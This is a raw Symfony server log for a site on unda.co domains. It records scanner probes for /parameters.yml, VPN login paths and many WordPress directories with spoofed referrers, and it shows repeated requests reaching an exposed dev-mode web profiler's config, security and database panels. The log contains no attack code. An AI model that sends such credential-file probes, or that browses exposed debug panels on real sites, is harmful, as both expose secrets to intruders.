[2025-12-21 03:59:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 03:59:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 03:59:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /remote/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /remote/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:02:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /parameters.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /parameters.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:02:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=cache","method":"GET"} []
[2025-12-21 04:02:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-21 04:07:10] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3926d2","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3926d2/search/results?ip=85.217.140.1&limit=10","method":"GET"} []
[2025-12-21 04:07:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10","method":"GET"} []
[2025-12-21 04:08:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ad45cc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ad45cc?panel=config","method":"GET"} []
[2025-12-21 04:08:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-21 04:11:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=time","method":"GET"} []
[2025-12-21 04:11:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-21 04:14:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e17e24","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e17e24?panel=security","method":"GET"} []
[2025-12-21 04:14:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-21 04:16:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=twig","method":"GET"} []
[2025-12-21 04:16:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-21 04:16:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=db","method":"GET"} []
[2025-12-21 04:16:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-21 04:19:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"13ecbf","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/13ecbf","method":"GET"} []
[2025-12-21 04:19:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 04:20:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4d61bf","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4d61bf?panel=logger","method":"GET"} []
[2025-12-21 04:20:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-21 04:21:19] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0c9887","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/0c9887/search/results?ip=85.217.140.1&limit=10&method=GET","method":"GET"} []
[2025-12-21 04:21:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10&method=GET","method":"GET"} []
[2025-12-21 04:24:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=security","method":"GET"} []
[2025-12-21 04:24:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-21 04:25:55] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3926d2","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3926d2/search/results?ip=85.217.140.1&limit=10&method=GET","method":"GET"} []
[2025-12-21 04:25:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10&method=GET","method":"GET"} []
[2025-12-21 04:26:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0): at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
[2025-12-21 04:27:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 04:30:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c9887","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/0c9887","method":"GET"} []
[2025-12-21 04:30:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 04:31:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=cache","method":"GET"} []
[2025-12-21 04:31:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-21 04:32:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:32:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:33:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:33:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:33:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:33:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:33:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:33:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:33:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:35:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2","method":"GET"} []
[2025-12-21 04:35:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 04:39:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2263c2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2263c2?panel=logger","method":"GET"} []
[2025-12-21 04:39:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-21 04:39:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"69e5c4","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/69e5c4?panel=form","method":"GET"} []
[2025-12-21 04:39:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-21 04:39:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 04:39:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
